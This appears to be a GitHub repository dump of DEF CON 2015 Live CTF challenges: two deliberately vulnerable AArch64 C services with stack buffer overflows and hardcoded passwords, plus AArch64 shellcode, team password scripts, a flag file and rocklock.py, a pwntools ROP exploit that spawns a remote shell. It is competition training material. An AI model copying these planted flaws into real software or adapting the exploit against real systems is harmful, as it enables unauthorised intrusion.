├── .gitignore ├── LICENSE ├── README.md ├── hearye ├── Makefile ├── flag ├── hearye ├── hearye.c ├── hearye.zip ├── hearye.zip.gpg ├── instructions.txt ├── pwn-execstack ├── pwn-strtol └── shellcode.s └── rocklock ├── gen-zip.sh ├── rocklock ├── rocklock.c ├── rocklock.py ├── rocklock1 ├── rocklock2 ├── rocklock3 ├── rocklock4 ├── team1.zip ├── team2.zip ├── team3.zip └── team4.zip /.gitignore: -------------------------------------------------------------------------------- 1 | livectf.zip 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 VECTOR 35 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # defcon2015-livectf 2 | Challenges from the DEF CON 2015 Finals Live CTF 3 | 4 | Note that the "execstack" payload only worked under qemu-user, not on native hardware, because of hardware-enforced DEP. It was left in anyway, just because. 5 | -------------------------------------------------------------------------------- /hearye/Makefile: -------------------------------------------------------------------------------- 1 | hearye: hearye.c 2 | #gcc -o hellomake hellomake.c hellofunc.c -I. 3 | aarch64-linux-gnu-gcc -z execstack -fno-stack-protector -static -g -O0 -o hearye hearye.c 4 | zip hearye.zip instructions.txt hearye 5 | 6 | clean: 7 | rm -f hearye *.i64 *.zip 8 | -------------------------------------------------------------------------------- /hearye/flag: -------------------------------------------------------------------------------- 1 | flag{YouMayNotHaveROPedYetButYouWillNextTime} 2 | -------------------------------------------------------------------------------- /hearye/hearye: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/hearye/hearye -------------------------------------------------------------------------------- /hearye/hearye.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: HearYe 3 | Author: Jordan Wiens 4 | Description: Dumb service meant for very fast exploitation.
5 | */ 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #define CLEAR "\033[2J\033[1;1H" 14 | #define WELCOME "Hear Ye, Hear Ye, The Ye Old Town Crier Service\n" 15 | /* Global tested by pwn(); it starts at 31337 and no statement in this file assigns it again. */ 16 | int pwnable = 31337; 17 | /* Print a prompt, flush stdout, and block until one character is read from stdin. */ 18 | void anykey() 19 | { 20 | printf("\nPress Any Key to Continue\n"); 21 | fflush(stdout); 22 | getchar(); 23 | } 24 | /* This file's own system(): fork, then in the child try /system/bin/sh -c cmd and fall back to /bin/sh, calling _exit(-1) if both execve() calls fail; the parent returns the raw waitpid() status. NOTE(review): the fork() and waitpid() results are not checked, so status can be returned uninitialised. */ 25 | int system(char* cmd) 26 | { 27 | char* argv[4]; 28 | argv[0] = "/system/bin/sh"; 29 | argv[1] = "-c"; 30 | argv[2] = cmd; 31 | argv[3] = NULL; 32 | 33 | pid_t pid = fork(); 34 | if (pid == 0) 35 | { 36 | execve(argv[0], argv, __environ); 37 | argv[0] = "/bin/sh"; 38 | execve(argv[0], argv, __environ); 39 | _exit(-1); 40 | } 41 | 42 | int status; 43 | waitpid(pid, &status, 0); 44 | return status; 45 | } 46 | /* Flush stdout, read one line from stdin, and return it converted with atol(). NOTE(review): buffer is 64 bytes but fgets() is given a limit of 128, so a line longer than 63 characters is written past the end of the stack buffer (CWE-121); the limit should be sizeof buffer. Presumably this is the intended flaw of the challenge. The fgets() result is not checked either, so at end of input atol() parses an uninitialised buffer. */ 47 | long choice() 48 | { 49 | char buffer[64]; 50 | fflush(stdout); 51 | fgets(buffer, 128, stdin); /* limit of 128 exceeds sizeof buffer (64) */ 52 | return atol(buffer); 53 | } 54 | /* Clear the screen, print the banner and the option list, and return the selection; the long from choice() is narrowed to unsigned int on return. */ 55 | unsigned int menu() 56 | { 57 | printf(CLEAR WELCOME); 58 | printf("1) Cry Havok\n2) Set my name\n3) Cry my name\n4) Pwn\n\n0) Quit\n\nCHOICE: "); 59 | return choice(); 60 | } 61 | /* Prompt for a name and return a pointer to a static 128-byte buffer that every call overwrites. The fgets() limit matches the buffer size here; strtok() cuts the string at the first newline. The fgets() result is not checked. */ 62 | char* setname() 63 | { 64 | static char criername[128]; 65 | printf("Well met, my liege. Please let us know how to identify you: "); 66 | fflush(stdout); 67 | fgets(criername,128,stdin); 68 | strtok(criername,"\n"); 69 | return criername; 70 | } 71 | /* Print the fixed passage, then wait for a key press via anykey(). */ 72 | void cry() 73 | { 74 | printf("Blood and destruction shall be so in use \nAnd dreadful objects so familiar \nThat mothers shall but smile when they behold \nTheir infants quarter\'d with the hands of war; \nAll pity choked with custom of fell deeds: \nAnd Caesar\'s spirit, ranging for revenge, \nWith Ate by his side come hot from hell, \nShall in these confines with a monarch\'s voice \nCry \'Havoc,\' and let slip the dogs of war; \nThat this foul deed shall smell above the earth \nWith carrion men, groaning for burial.\n\n"); 75 | anykey(); 76 | } 77 | /* Print the proclamation with name substituted through a fixed %s conversion (name is never used as the format string), then wait for a key press. */ 78 | void cryname(char *name) 79 | { 80 | printf("Hear Ye, Hear Ye!
All ye Kings and Queens, Knights and Nobles, Peasants and\nPwners. Bask in the glory that is %s and their skills are legion. Cower, and be a feared.",name); 81 | anykey(); 82 | } 83 | /* Print a refusal, and only when the global pwnable equals 35 run "cat this-is-not-the-flag" through system(); pwnable is initialised to 31337 and no statement in this file changes it. Then wait for a key press. */ 84 | void pwn() 85 | { 86 | printf("Sorry, it's not that easy...\n"); 87 | if (pwnable==35) 88 | { 89 | system("cat this-is-not-the-flag"); 90 | } 91 | anykey(); 92 | } 93 | 94 | /* Menu loop: dispatch on the value returned by menu() until it is 0; values other than 1-4 take no action. The copy in case 2 is bounded, since source and destination are both 128 bytes. NOTE(review): name is not initialised before the loop, so selecting 3 before 2 passes indeterminate stack bytes to the %s conversion in cryname(); declaring it as char name[128] = {0}; avoids that. argc and argv are unused. */ 95 | int main(int argc, char* argv[]) 96 | { 97 | unsigned int choice=35; 98 | char name[128]; /* left uninitialised until option 2 runs */ 99 | 100 | do { 101 | choice = menu(); 102 | switch (choice) 103 | { 104 | case 1: 105 | cry(); 106 | break; 107 | case 2: 108 | bzero(name,128); 109 | memcpy(name,setname(),128); 110 | break; 111 | case 3: 112 | cryname(name); 113 | break; 114 | case 4: 115 | pwn(); 116 | break; 117 | } 118 | 119 | } while (choice != 0); 120 | 121 | printf("\nGoodbye...\n\n"); 122 | 123 | return 0; 124 | } 125 | -------------------------------------------------------------------------------- /hearye/hearye.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/hearye/hearye.zip -------------------------------------------------------------------------------- /hearye/hearye.zip.gpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/hearye/hearye.zip.gpg -------------------------------------------------------------------------------- /hearye/instructions.txt: -------------------------------------------------------------------------------- 1 | This challenge is a stand alone challenge, and should be completed as quickly as possible. 2 | 3 | The fastest teams will receive extra points. 4 | 5 | There are no SLA checks for this service. Once you have exploited it and submitted the flag, you are done. 6 | 7 | The binary is running on a Nexus 9 running Android 5.1.1.
The only changes are that it was rooted. 8 | 9 | IP: 10.5.18.2 10 | PORT: 3535 11 | 12 | The flag is in the current working directory. It is called "flag". 13 | 14 | Submit to: 15 | 16 | https://10.3.1.7/livectf/ 17 | 18 | (Replace with the flag from the flag file. If you get json back, it worked) 19 | 20 | Good luck. 21 | -------------------------------------------------------------------------------- /hearye/pwn-execstack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/hearye/pwn-execstack -------------------------------------------------------------------------------- /hearye/pwn-strtol: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/hearye/pwn-strtol -------------------------------------------------------------------------------- /hearye/shellcode.s: -------------------------------------------------------------------------------- 1 | .section .text, "ax" 2 | .global _start 3 | _start: 4 | nop 5 | mov x0,#0x490000 6 | add x0, x0, #0x4000 7 | add x0,x0,#0xA58 8 | nop 9 | #mov x0, #0x490000 10 | #mov x1, #0x4A00 11 | #add x0, x1, x0 12 | #add x0, x1, #0x58 13 | 14 | mov x1, #0x400000 15 | add x1, x1, #0xea8 16 | br x1 17 | -------------------------------------------------------------------------------- /rocklock/gen-zip.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for team in 1 2 3 4 3 | do 4 | case $team in 5 | 1) 6 | password="letmein181" 7 | ;; 8 | 2) 9 | password="letmein244" 10 | ;; 11 | 3) 12 | password="letmein364" 13 | ;; 14 | 4) 15 | password="letmein474" 16 | ;; 17 | esac 18 | echo "Same Nexus 9 running Android 5.1.1. 19 | 20 | IP: 10.5.18.2 21 | PORT: 500$team 22 | 23 | THERE IS NO FLAG -- execute './win' to show you've won. 
24 | 25 | Good luck." > instructions-team$team.txt 26 | rm team$team.zip 27 | zip team$team.zip instructions-team$team.txt rocklock$team 28 | rm instructions-team$team.txt 29 | done 30 | -------------------------------------------------------------------------------- /rocklock/rocklock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/rocklock -------------------------------------------------------------------------------- /rocklock/rocklock.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | /* locked is only read in this file (by check_lock_status) and never written; greeting is the 1024-byte global that menu() option 3 overwrites. */ 6 | static bool locked = true; 7 | static char greeting[1024] = "Enter your authentication code to access this facility."; 8 | /* This file's own system(): fork, then in the child try /system/bin/sh -c cmd and fall back to /bin/sh, calling _exit(-1) if both execve() calls fail; the parent returns the raw waitpid() status. NOTE(review): the fork() and waitpid() results are not checked, so status can be returned uninitialised. */ 9 | int system(char* cmd) 10 | { 11 | char* argv[4]; 12 | argv[0] = "/system/bin/sh"; 13 | argv[1] = "-c"; 14 | argv[2] = cmd; 15 | argv[3] = NULL; 16 | 17 | pid_t pid = fork(); 18 | if (pid == 0) 19 | { 20 | execve(argv[0], argv, __environ); 21 | argv[0] = "/bin/sh"; 22 | execve(argv[0], argv, __environ); 23 | _exit(-1); 24 | } 25 | 26 | int status; 27 | waitpid(pid, &status, 0); 28 | return status; 29 | } 30 | /* Report the lock state by printing LOCKED or UNLOCKED according to the global locked flag. */ 31 | void check_lock_status() 32 | { 33 | if (locked) 34 | printf("Device is LOCKED\n"); 35 | else 36 | printf("Device is UNLOCKED\n"); 37 | } 38 | /* Print a notice that changing the lock state is disabled; the function never writes locked. */ 39 | void set_lock_status() 40 | { 41 | printf("This feature is disabled by administrative policy.
This setting\n"); 42 | printf("can be modified using the physical link interface.\n"); 43 | } 44 | /* Read up to 1022 characters into a 1024-byte local, drop a trailing newline, then strcpy() the result into buf; _exit(1) on end of input. NOTE(review): the function is never told how large buf is, and the only caller in this file passes a 256-byte array, so a greeting longer than 255 characters overruns it (CWE-121). Passing the destination size and rejecting or truncating longer input would bound the copy. */ 45 | void change_greeting(char* buf) 46 | { 47 | char data[1024]; 48 | printf("New greeting: "); 49 | if (!fgets(data, 1023, stdin)) 50 | _exit(1); 51 | 52 | size_t len = strlen(data); 53 | if ((len > 0) && (data[len - 1] == '\n')) 54 | data[len - 1] = 0; 55 | 56 | strcpy(buf, data); /* unbounded copy: data can hold up to 1023 bytes including the terminator */ 57 | } 58 | /* Print the global greeting through a fixed %s conversion. */ 59 | void display_greeting() 60 | { 61 | printf("Current greeting: %s\n", greeting); 62 | } 63 | /* Interactive loop: print the options, read a choice with fgets() and atoi(), ignore anything outside 1-5, and dispatch; 5 leaves the loop. Option 3 fills the local 256-byte buf through change_greeting() and then copies it into the 1024-byte global greeting. */ 64 | void menu() 65 | { 66 | char buf[256]; 67 | while (true) 68 | { 69 | printf("\nMenu:\n"); 70 | printf("1) Check lock status\n"); 71 | printf("2) Set lock status (DISABLED by policy)\n"); 72 | printf("3) Change greeting\n"); 73 | printf("4) Display greeting\n"); 74 | printf("5) Exit\n\n"); 75 | printf("Choose an option: "); 76 | fflush(stdout); 77 | 78 | char opt[32]; 79 | if (!fgets(opt, 31, stdin)) 80 | _exit(1); 81 | int choice = atoi(opt); 82 | if ((choice < 1) || (choice > 5)) 83 | continue; 84 | 85 | printf("\n"); 86 | 87 | if (choice == 1) 88 | { 89 | check_lock_status(); 90 | } 91 | else if (choice == 2) 92 | { 93 | set_lock_status(); 94 | } 95 | else if (choice == 3) 96 | { 97 | change_greeting(buf); /* buf is 256 bytes, but change_greeting() may copy up to 1023 */ 98 | strcpy(greeting, buf); 99 | } 100 | else if (choice == 4) 101 | { 102 | display_greeting(); 103 | } 104 | else if (choice == 5) 105 | { 106 | break; 107 | } 108 | } 109 | } 110 | /* Print the banner, run "date" through this file's system(), then require the line "letmeinplz" before entering menu(); any other input returns 1. NOTE(review): the password is a string literal compiled into the binary (CWE-798) and can be read by anyone who holds the binary. gen-zip.sh on this page lists a different password per team, so the rocklock1-4 binaries were presumably built from variants of this file. i is unused. */ 111 | int main() 112 | { 113 | int i; 114 | printf("Rock Lock RLK8239 Wireless Management Interface\n"); 115 | system("date"); 116 | printf("\nPassword: "); 117 | fflush(stdout); 118 | 119 | char pwd[256]; 120 | if (!fgets(pwd, 255, stdin)) 121 | _exit(1); 122 | if (strcmp(pwd, "letmeinplz\n") != 0) 123 | return 1; 124 | 125 | menu(); 126 | return 0; 127 | } 128 | 129 | -------------------------------------------------------------------------------- /rocklock/rocklock.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import sys 3 |
4 | team = int(sys.argv[2]) 5 | p = remote(sys.argv[1], 5000 + team) 6 | 7 | greeting = 0x493018 8 | pop_x19 = 0x400790 9 | mov_x0_x19 = 0x400788 10 | system = 0x400e38 11 | fill = 0x4141414141414141 12 | 13 | if team == 0: 14 | p.send("letmeinplz\n") 15 | elif team == 1: 16 | p.send("letmein181\n") 17 | elif team == 2: 18 | p.send("letmein244\n") 19 | elif team == 3: 20 | p.send("letmein364\n") 21 | elif team == 4: 22 | p.send("letmein474\n") 23 | 24 | rop = p64(pop_x19) + "A"*0x100 25 | rop += p64(fill) + p64(mov_x0_x19) + p64(greeting) + p64(fill) + p64(fill) + p64(fill) + p64(fill) + "A"*0x68 26 | rop += p64(fill) + p64(system) 27 | 28 | cmd = "sh\x00" 29 | payload = cmd + "A" * (0x110 - len(cmd)) + rop 30 | 31 | while len(payload) > 0: 32 | p.send("3\n") 33 | p.send(payload.replace('\x00', 'A') + "\n") 34 | zero = payload.rfind('\x00') 35 | if zero == -1: 36 | break 37 | payload = payload[0:zero] 38 | 39 | p.send("5\n") 40 | 41 | p.interactive() 42 | 43 | -------------------------------------------------------------------------------- /rocklock/rocklock1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/rocklock1 -------------------------------------------------------------------------------- /rocklock/rocklock2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/rocklock2 -------------------------------------------------------------------------------- /rocklock/rocklock3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/rocklock3 -------------------------------------------------------------------------------- /rocklock/rocklock4: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/rocklock4 -------------------------------------------------------------------------------- /rocklock/team1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/team1.zip -------------------------------------------------------------------------------- /rocklock/team2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/team2.zip -------------------------------------------------------------------------------- /rocklock/team3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/team3.zip -------------------------------------------------------------------------------- /rocklock/team4.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/team4.zip --------------------------------------------------------------------------------